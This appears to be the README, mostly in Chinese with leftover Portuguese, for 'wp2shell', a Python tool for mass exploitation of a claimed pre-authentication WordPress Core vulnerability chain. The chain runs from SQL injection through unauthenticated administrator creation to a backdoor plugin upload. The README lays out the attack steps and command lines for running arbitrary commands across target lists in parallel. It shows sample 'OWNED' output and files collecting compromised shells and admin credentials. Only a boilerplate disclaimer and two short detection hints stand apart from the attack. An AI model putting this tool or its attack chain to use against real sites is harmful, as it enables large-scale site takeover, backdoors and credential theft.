Python 大规模利用与检测工具,针对 WordPress Core 预认证 RCE 链 CVE-2026-63030 和 CVE-2026-60137,将 SQL 注入串联至远程代码执行。
| 属性 | 详情 |
|---|---|
| CVE ID | CVE-2026-63030(+ CVE-2026-60137) |
| 利用链 | wp2shell — 预认证 RCE |
| 严重性 | 🔴 严重(CVSS 9.8) |
| 目标 | WordPress Core(无插件) |
| 受影响(RCE) | 6.9.0 – 6.9.4 和 7.0.0 – 7.0.1 |
| 受影响(仅 SQLi) | 6.8.0 – 6.8.5 |
| 已修复 | 6.8.6 / 6.9.5 / 7.0.2(2026年7月18日) |
| 所需认证 | 无 |
WordPress 核心中的两个链式漏洞:
WP_Query 的 author__not_in 参数存在 SQL 注入。/wp-json/batch/v1 使批量条目失步,导致一个请求“落入”下一个路由。该利用链将 SQLi 转化为预认证 RCE:
route confusion /wp-json/batch/v1 ─► SQLi no author__not_in
│ │
└──────────────┬─────────────────────┘
▼
UNION fake-post + oEmbed + changeset poisoning
▼
POST /wp/v2/users (roles: administrator) ← admin criado sem auth
▼
login → upload plugin backdoor → RCE
回退方案:直接 INTO OUTFILE(FILE 权限)以及盲注提取哈希 + 破解。
python wp2shell.py exploit -l targets.txt --cmd whoami --authorized -k -c 10 --delay 2
python wp2shell.py remote -l targets.txt --authorized --active-probe -c 20 -f csv -o scan.csv
| 选项 | 描述 |
|---|---|
-l, --targets-file | 每行一个目标(可重复,无限制) |
-u, --target | 单个目标 |
--cmd | 在目标上执行的命令 |
--authorized | 必需(或 WP2SHELL_AUTHORIZED=1) |
-c, --concurrency | 并行目标数(1–32) |
--delay | 计时/提取的 SLEEP(2 = 稳健) |
--rate | 每个目标的请求数/秒 |
-k, --insecure | 忽略 TLS |
--proxy | HTTP 代理 |
--wordlist / --password / --username | 凭据回退 |
--log / --owned / --results-csv | 输出文件 |
[+] [14:22:31] https://target.com OWNED ✓1 ~0 ✗10
[~] [14:22:32] https://other.com ADMIN ✓1 ~1 ✗10
---- SUMMARY ----
[+] owned=1 [~] admin=1 [-] fail=10 [.] error=0
owned.txt — 具有 RCE 的目标(shell URL)admins.txt — 创建的 admin 但无 RCE 利用点(凭据)exploit_log.txt — 每个目标的详细信息results.csv — 摘要(exit_code:0=owned,4=admin,2=fail,3=error)whl_page)+ 常见 slug├── wp2shell.py # exploit + detector
├── targets.txt # alvos (uma URL por linha)
├── owned.txt # RCE conseguido (auto-criado)
├── admins.txt # admins criados (auto-criado)
└── README.md
╔══════════════════════════════════════════════════════════════════╗
║ LEGAL DISCLAIMER ║
╠══════════════════════════════════════════════════════════════════╣
║ This tool is provided for EDUCATIONAL and AUTHORIZED ║
║ SECURITY TESTING purposes only. ║
║ Only use on systems you own or have explicit permission. ║
║ The author is NOT responsible for any misuse or damage. ║
╚══════════════════════════════════════════════════════════════════╝
/wp-json/batch/v1 和 /?rest_route=/batch/v1 的未认证 POST 请求wp-content/uploads/ 和 wp-content/plugins/ 中是否存在可疑 PHP 文件